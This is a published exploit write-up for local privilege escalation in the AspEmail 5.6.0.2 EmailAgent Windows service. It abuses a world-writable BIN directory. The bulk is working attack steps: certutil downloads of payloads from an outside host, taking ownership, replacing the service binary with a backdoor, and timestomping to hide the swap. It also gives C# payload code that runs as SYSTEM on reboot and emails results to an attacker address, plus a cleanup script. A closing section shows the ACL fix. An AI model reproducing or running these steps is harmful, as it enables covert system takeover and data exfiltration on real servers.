Share
## https://sploitus.com/exploit?id=PACKETSTORM:171905
####################################################################################################################  
# Exploit Title: AspEmail 5.6.0.2 - Local Privilege Escalation #  
# Vulnerability Category: [Weak Services Permission - Binary Permission Vulnerability] #  
# Date: 13/04/2023 #  
# Exploit Author: Zer0FauLT [admindeepsec@proton.me] #  
# Vendor Homepage: https://www.aspemail.com #  
# Software Link: https://www.aspemail.com/download.html #  
# Product: AspEmail #  
# Version: AspEmail 5.6.0.2 and all #  
# Platform - Architecture : Windows - 32-bit | 64-bit | Any CPU #  
# Tested on: Windows Server 2016 and Windows Server 2019 #  
# CVE : 0DAY #  
####################################################################################################################  
  
# ==================================================================================================================  
  
[+] C:\PenTest>whoami /priv  
  
PRIVILEGES INFORMATION  
----------------------  
  
Privilege Name Description State   
============================= ========================================= ========  
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled  
SeChangeNotifyPrivilege Bypass traverse checking Enabled   
SeImpersonatePrivilege Impersonate a client after authentication Enabled   
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled  
  
# ==================================================================================================================  
  
* First, we will test whether the AspEmail service is active.  
* First of all, we perform a query to list the processes running in the system with normal user rights and test whether the process of the relevant service is running:  
  
[+] C:\PenTest>tasklist /svc | findstr EmailAgent.exe  
EmailAgent.exe 4400 Persits Software EmailAgent  
  
or   
  
[+] C:\PenTest>tasklist /svc | findstr EmailAgent64.exe  
EmailAgent64.exe 4400 Persits Software EmailAgent  
  
* We have detected that the process of the "Persits Software Email Agent" Service is state "RUNNING".   
* Now we know that AspEmail service is active.  
  
# ==================================================================================================================  
  
* We will need these:  
  
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/EmailAgent.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgentPrivESC.exe" <<<=== MyExploit  
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/nircmd.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\nircmd.exe"  
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Mail.exe "C:\Windows\Temp\Mail.exe"  
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Run.exe "C:\Windows\Temp\Run.bat"  
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/PrivescCheck.ps1 "C:\PenTest\PrivescCheck.ps1"  
  
# ==================================================================================================================  
  
[+] C:\PenTest>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"  
  
Name: Persits Software EmailAgent  
ImagePath : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\Email  
Agent.exe" /run  
User : LocalSystem  
ModifiablePath : C:\Program Files (x86)\Persits Software\AspEmail\BIN  
IdentityReference : Everyone  
Permissions : WriteOwner, Delete, WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory,   
AppendData/AddSubdirectory, WriteExtendedAttributes, WriteDAC, ReadAttributes, WriteData/AddFile,   
ReadExtendedAttributes, DeleteChild, Execute/Traverse  
Status : Unknown  
UserCanStart : False  
UserCanStop : False  
  
[+] C:\PenTest>del PrivescCheck.ps1  
  
* We detected "Persits Software EmailAgent" Service "Binary Permission Vulnerability" in our checks.  
  
# ================================================================================================================== #  
  
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail"  
  
Successfully processed 0 files; Failed processing 1 files  
C:\Program Files (x86)\Persits Software\AspEmail: Access is denied.  
  
* We do not have permission to access subdirectories.  
  
# ==================================================================================================================  
  
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"  
  
C:\Program Files (x86)\Persits Software\AspEmail\BIN Everyone:(OI)(CI)(F)  
DeepSecLab\psacln:(I)(OI)(CI)(N)  
DeepSecLab\psaadm:(I)(OI)(CI)(N)  
DeepSecLab\psaadm_users:(I)(OI)(CI)(N)  
BUILTIN\Administrators:(I)(F)  
CREATOR OWNER:(I)(OI)(CI)(IO)(F)  
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(RX)  
NT SERVICE\TrustedInstaller:(I)(CI)(F)  
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)  
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)  
BUILTIN\Users:(I)(OI)(CI)(RX)  
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(RX)  
  
* Unlike other directories, we have full privileges in the "BIN" directory of the service.   
* This is chmod 0777 - rwxrwxrwx in linux language.  
  
# ==================================================================================================================  
  
[+] C:\PenTest>wmic path Win32_LogicalFileSecuritySetting where Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID  
  
__PATH   
  
\\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"   
  
\\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-32-544"  
root\cimv2 DeepSecLab {} 5 Win32_SID.SID="S-1-5-32-544" Win32_SID Win32_SID 2 Administrators {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0} BUILTIN S-1-5-32-544 16  
[EmailAgent.exe] ===>>> Owner: BUILTIN\Administrators  
  
* We understood "EmailAgent.exe" processor was installed by the Administrator and the owner is the Administrator user.  
  
# ==================================================================================================================  
  
* Now we will take ownership of this directory as we will execute our operations under the "BIN" directory.  
  
[+] C:\PenTest>whoami  
DeepSecLab\Hacker  
  
[+] C:\PenTest>takeown /f "C:\Program Files (x86)\Persits Software\AspEmail\BIN"  
SUCCESS: The file (or folder): "C:\Program Files (x86)\Persits Software\AspEmail\BIN" now owned by user "DeepSecLab\Hacker".  
  
[+] C:\PenTest>"C:\Program Files (x86)\Persits Software\AspEmail\BIN" /Grant DeepSecLab\Hacker:F  
  
processed file: C:\Program Files (x86)\Persits Software\AspEmail\BIN  
Successfully processed 1 files; Failed processing 0 files  
  
* Ok. All commands resulted successfully. We now have full privileges for this directory.   
  
# ==================================================================================================================  
  
* Now we will modify the EmailAgent file and inject a self-written malware.   
* We will be careful not to damage any files while doing this so that all transactions can be easily undone.  
  
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgent.exe Null.EmailAgent.exe  
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgentPrivESC.exe EmailAgent.exe  
  
# ==================================================================================================================  
  
[+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir  
Volume in drive C has no label.  
Volume Serial Number is 0C8A-5291  
  
Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin  
  
14.04.2023 16:47 <DIR> .  
14.04.2023 16:47 <DIR> ..  
01.03.2004 15:55 143.360 AspEmail.dll  
25.02.2004 16:23 188.416 AspUpload.dll  
13.04.2023 22:00 12.288 EmailAgent.exe <<<=== Renamed for EmailAgentPrivESC.exe  
24.09.2003 09:22 139.264 EmailAgentCfg.cpl  
24.09.2003 09:25 94.208 EmailLogger.dll  
24.09.2003 09:21 167.936 Null.EmailAgent.exe  
6 File(s) 745.472 bytes  
2 Dir(s) 165.936.717.824 bytes free  
  
# ==================================================================================================================  
  
* We are now making the settings on Last Modified Date, Creation Date and Last Accessed Date.  
  
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>nircmd.exe setfiletime "EmailAgent.exe" "24.03.2007 09:21:30" "24.03.2007 09:21:30" "23.05.2017 06:42:28"  
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>del nircmd.exe  
  
# ==================================================================================================================  
  
[+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir  
Volume in drive C has no label.  
Volume Serial Number is 0C8A-5291  
  
Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin  
  
14.04.2023 16:47 <DIR> .  
14.04.2023 16:47 <DIR> ..  
01.03.2004 15:55 143.360 AspEmail.dll  
25.02.2004 16:23 188.416 AspUpload.dll  
24.09.2003 09:21 12.288 EmailAgent.exe  
24.09.2003 09:22 139.264 EmailAgentCfg.cpl  
24.09.2003 09:25 94.208 EmailLogger.dll  
24.09.2003 09:21 167.936 Null.EmailAgent.exe  
6 File(s) 745.472 bytes  
2 Dir(s) 165.936.717.824 bytes free  
  
[24.09.2003 09:21] 12.288 EmailAgent.exe  
[24.09.2003 09:21] 167.936 Null.EmailAgent.exe  
  
* And time manipulation is over. They look like they were uploaded at the same time long ago.  
  
# ==================================================================================================================  
  
* Now we check for my malware ownership.  
  
[+] C:\PenTest>wmic path Win32_LogicalFileSecuritySetting where Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID  
  
__PATH   
  
\\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"   
  
\\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511" root\cimv2 DeepSecLab {} 5 Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511" Win32_SID Win32_SID 2 Hacker {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 93, 55, 254, 218, 13, 191, 125, 10, 115, 72, 175, 124, 231, 5, 0, 0} DeepSecLab S-1-5-21-3674093405-176013069-2091862131-1511 28  
  
[+] wmic useraccount where sid="S-1-5-21-3674093405-176013069-2091862131-1511" get name  
  
Name   
  
DeepSecLab\Hacker   
  
EmailAgent.exe Owner: DeepSecLab\Hacker  
  
# =================================================================================================================#  
# #  
####################################################################################################################  
# #[EmailAgent.exe]# #  
####################################################################################################################  
# #   
#  
* We program this malware in such a way that when the server is reboot(when the services are restarted), #  
* It will be triggered and execute the codes we want, #  
* And then send a printout of all this to the email address we specified. #  
#  
using System; #  
using System.Linq; #  
using System.Text; #  
using System.Diagnostics; #  
using System.IO; #  
using System.Collections; #  
#  
namespace CliToolSpace #  
{ #  
class _Main #  
{ #  
static void Main(string[] args) #  
{ #  
Cli commandLine = new Cli(); #  
commandLine.FileToCli(@"C:\Windows\Temp\Mail.exe & C:\Windows\Temp\Run.bat"); #  
commandLine.Execute(); #  
commandLine.ToFile(@"C:\Windows\Temp\"); #  
} #  
} #  
} #  
#  
# #  
####################################################################################################################  
# #[Mail.exe]# #  
####################################################################################################################  
# #  
#  
using System; #  
using System.Net.Mail; #  
using System.Net; #  
SmtpClient SmtpServer = new SmtpClient("smtp.deepseclab.com"); #  
var mail = new MailMessage(); #  
mail.From = new MailAddress("mail@deepseclab.com"); #  
mail.To.Add("mail@hacker.com"); #  
mail.Subject = "Trigger Successful!"; #  
mail.IsBodyHtml = true; #  
string htmlBody; #  
htmlBody = "<strong>This server has been rebooted.</strong>"; #  
mail.Body = htmlBody; #  
Attachment attachment; #  
attachment = new Attachment(@"C:\Windows\Temp\Export.txt"); #  
mail.Attachments.Add(attachment); #  
SmtpServer.Port = 587; #  
SmtpServer.UseDefaultCredentials = false; #  
SmtpServer.Credentials = new System.Net.NetworkCredential("mail@deepseclab.com","p@ssw0rd123"); #  
SmtpServer.EnableSsl = true; #  
SmtpServer.Timeout = int.MaxValue; #  
SmtpServer.Send(mail); #  
#  
# #  
####################################################################################################################  
# #[Run.bat]# #  
####################################################################################################################  
# #  
#  
whoami > C:\Windows\Temp\Export.txt #  
cd C:\Program Files (x86)\Persits Software\AspEmail\Bin #  
del EmailAgent.exe & ren Null.EmailAgent.exe EmailAgent.exe #  
cd c:\Windows\Tasks #  
del Run.bat & del Mail.exe #  
#  
# #  
####################################################################################################################  
# #  
[+]Trigger Successful![+] #  
#  
[+] C:\PenTest>systeminfo | findstr "Boot Time" #  
System Boot Time: 13.04.2022, 07:46:06 #  
#  
# #  
####################################################################################################################  
#[Export.txt]# #  
####################################################################################################################  
# #  
#  
NT AUTHORITY\SYSTEM #  
#  
# #  
####################################################################################################################  
# #   
# ==================================================================================================================  
# ...|||[FIX]|||... #  
# ==================================================================================================================  
# [+] C:\>Runas /profile /user:DeepSecLab\Administrator CMD [+] #  
# =================================================================================================================#  
  
[+] C:\Administrator>sc qc "Persits Software EmailAgent"  
[SC] QueryServiceConfig SUCCESS  
  
SERVICE_NAME: Persits Software EmailAgent  
TYPE : 10 WIN32_OWN_PROCESS  
START_TYPE : 2 AUTO_START  
ERROR_CONTROL : 1 NORMAL  
BINARY_PATH_NAME : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgent.exe" /run  
LOAD_ORDER_GROUP :  
TAG : 0  
DISPLAY_NAME : Persits Software EmailAgent  
DEPENDENCIES : rpcss  
SERVICE_START_NAME : LocalSystem  
  
# ==================================================================================================================  
  
[+] C:\Administrator>sc sdshow "Persits Software EmailAgent"  
  
D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)  
  
# ==================================================================================================================  
  
[+] C:\Administrator>accesschk64.exe -wuvc "Persits Software EmailAgent" -accepteula  
  
Accesschk v6.15 - Reports effective permissions for securable objects  
Copyright (C) 2006-2022 Mark Russinovich  
Sysinternals - www.sysinternals.com  
  
Persits Software EmailAgent  
Medium Mandatory Level (Default) [No-Write-Up]  
RW NT AUTHORITY\SYSTEM  
SERVICE_ALL_ACCESS  
RW BUILTIN\Administrators  
SERVICE_ALL_ACCESS  
  
# ==================================================================================================================  
  
[+] C:\Administrator>ICACLS "C:\Program Files (x86)\Persits Software" /T /Q /C /RESET  
  
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"  
  
Successfully processed 0 files; Failed processing 1 files  
C:\Program Files (x86)\Persits Software\AspEmail\Bin: Access is denied.  
  
DONE!  
  
# ==================================================================================================================  
  
[+] C:\Administrator>sc stop "Persits Software EmailAgent"  
  
[+] PS C:\Administrator> Start-Service -Name "Persits Software EmailAgent"  
  
* These commands are optional. Used to stop the "Persits Software EmailAgent" service. We fixed the vulnerability and I don't think it's necessary anymore.  
  
# ==================================================================================================================